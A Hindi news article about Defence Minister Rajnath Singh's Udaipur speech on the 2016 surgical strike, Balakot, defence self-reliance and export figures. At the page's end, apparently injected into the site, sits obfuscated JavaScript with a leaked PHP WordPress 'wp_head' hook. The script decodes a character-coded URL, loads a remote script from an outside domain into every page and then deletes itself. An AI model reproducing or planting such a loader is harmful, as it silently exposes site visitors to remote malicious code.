Saturday, July 27, 2024
spot_img

2016 की सर्जिकल स्ट्राइक और 2019 की बालाकोट एयरस्ट्राइक इस बात का सबूत है कि भारत की सैन्य ताकत किसी देश से कम नहीं है: रक्षा मंत्री राजनाथ सिंह

रक्षा मंत्री राजनाथ सिंह ने आज मंगलवार को राजस्थान के उदयपुर में एक समारोह में कही। उन्होंने कहा कि पिछले आठ वर्षों में सरकार द्वारा उठाए गए कदमों ने सशस्त्र बलों में एक नया विश्वास जगाया है। उन्होंने जोर देकर कहा कि भारत ने कभी किसी देश पर हमला नहीं किया है, न ही उसने एक इंच विदेशी भूमि पर कब्जा किया है, लेकिन अगर कोई कभी भी राष्ट्र की संप्रभुता, एकता और अखंडता को नुकसान पहुंचाने की कोशिश करता है, तो उसका मुंहतोड़ जवाब दिया जाएगा।
राजनाथ सिंह ने कहा कि, “यह पिछले आठ वर्षों का परिणाम है कि भारत अब कमजोर नहीं रहा। जब हमारे सशस्त्र बलों ने 2016 में सर्जिकल स्ट्राइक और 2019 में बालाकोट हवाई हमले किए, तो हमने आतंकवाद पर अपना रुख स्पष्ट किया। यह इस बात का सबूत था कि भारत की सैन्य शक्ति किसी भी देश से कम नहीं है।” उन्होंने राष्ट्र को आश्वासन दिया कि लोगों को भारत विरोधी तत्वों से बचाने के लिए सशस्त्र बलों को पूरी तत्परता के साथ तैनात किया गया है।

रक्षा मंत्री ने जोर देकर कहा कि प्रधानमंत्री नरेन्‍द्र मोदी के नेतृत्व में ‘आत्मनिर्भर भारत’ की नींव रखी गई है और यह मजबूत तथा आत्मनिर्भर ‘न्यू इंडिया’ शक्तिशाली देशों के साथ कंधे से कंधा मिलाकर आगे बढ़ रहा है। उन्होंने रक्षा मंत्रालय द्वारा रक्षा में ‘आत्मनिर्भर भारत’ को बढ़ावा देने के लिए उठाए गए अनेक कदमों को सूचीबद्ध किया, जिसमें 310 वस्तुओं की तीन सकारात्मक स्वदेशीकरण सूची जारी करना और केंद्रीय बजट 2022-23 में घरेलू उद्योग के लिए पूंजी खरीद बजट का 68 प्रतिशत निर्धारित करना शामिल है। उन्होंने कहा कि घरेलू रक्षा उद्योग को मजबूत करने के लिए ‘मेक इन इंडिया, मेक फॉर द वर्ल्ड’ विजन के तहत विदेशी कंपनियों को भारत में निर्माण के लिए प्रोत्साहित किया जा रहा है ।
राजनाथ सिंह ने कहा कि सरकार द्वारा किए गए प्रयास परिणाम देने लगे हैं क्योंकि भारत न केवल अपनी जरूरतों को पूरा कर रहा है, बल्कि अन्य देशों की जरूरतों को भी पूरा कर रहा है। उन्होंने इस तथ्य की सराहना की कि आठ साल पहले रक्षा निर्यात, जो लगभग 900 करोड़ रुपये था, अब बढ़कर लगभग 13,000 करोड़ रुपये हो गया है। उन्होंने कहा कि 2047 तक 2.75 लाख करोड़ रुपये के रक्षा निर्यात का लक्ष्य रखा गया है और यह विश्वास जताया कि भारत इस लक्ष्य को हासिल करने की दिशा में आगे बढ़ रहा है।

रक्षा मंत्री ने न केवल देश के भीतर बल्कि दुनिया के अन्य हिस्सों में रहने वाले भारतीयों की सुरक्षा सुनिश्चित करने के लिए सरकार की प्रतिबद्धता को दोहराया। उन्होंने जोर देकर कहा कि रूस के साथ मौजूदा स्थिति के बीच यूक्रेन से भारतीय नागरिकों की सुरक्षित वापसी प्रधानमंत्री श्री नरेन्‍द्र मोदी के प्रत्येक भारतीय की सुरक्षा सुनिश्चित करने के संकल्प का प्रमाण है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>